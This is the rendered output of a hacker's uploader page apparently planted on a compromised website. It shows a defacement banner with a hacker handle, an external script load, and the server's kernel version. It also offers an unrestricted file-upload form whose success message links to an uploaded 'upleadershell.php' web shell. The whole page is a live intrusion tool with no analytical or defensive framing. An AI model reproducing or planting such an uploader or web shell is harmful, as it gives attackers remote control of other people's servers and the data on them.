
<html><title>9nas_007 is here </title>
<script src="http://e-mete.com/js/kdsnow.js"></script> <style> body{ background-image: url(); background-repeat: no-repeat; background-attachment: fixed; background-position: top; background-color:#000000; position: relative; background-size:100% 100vh; } .logo { width: 300px; height: 300px; margin: 0 auto; margin-top: 50px; -webkit-filter: drop-shadow(0px 0px 7px #0080FF); filter: drop-shadow(0px 0px 7px #0080FF); } .logo:hover{ width: 300px; height: 300px; -webkit-filter: drop-shadow(0px 0px 10px #0080FF); opacity:0.4; filter:alpha(opacity=40); transition: opacity .2s ease-out; -moz-transition: opacity .2s ease-out; -webkit-transition: opacity .2s ease-out; -o-transition: opacity .2s ease-out; }</style>
<table width="100%" height="100%"><td align=center>
<img src="http://store4.up-00.com/2017-07/149899069632691.png" width="350" height="350">
<font color=cyan>
https://www.facebook.com/9nas.gov.union<br><b>Linux ept.eptmusa.com 2.6.32-642.13.1.el6.x86_64 #1 SMP Wed Jan 11 20:56:24 UTC 2017 x86_64</b><br><form method='post' enctype='multipart/form-data'>
      <input type='file' name='just_file'>
      <input type='submit' name='upload' value='hajar goblok!!!'>
      </form>sukses upload -> <a href='http://eptmusa.com/upleadershell.php' target='_blank'><b><u>http://eptmusa.com//upleadershell.php</u></b></a></font></table></td></html>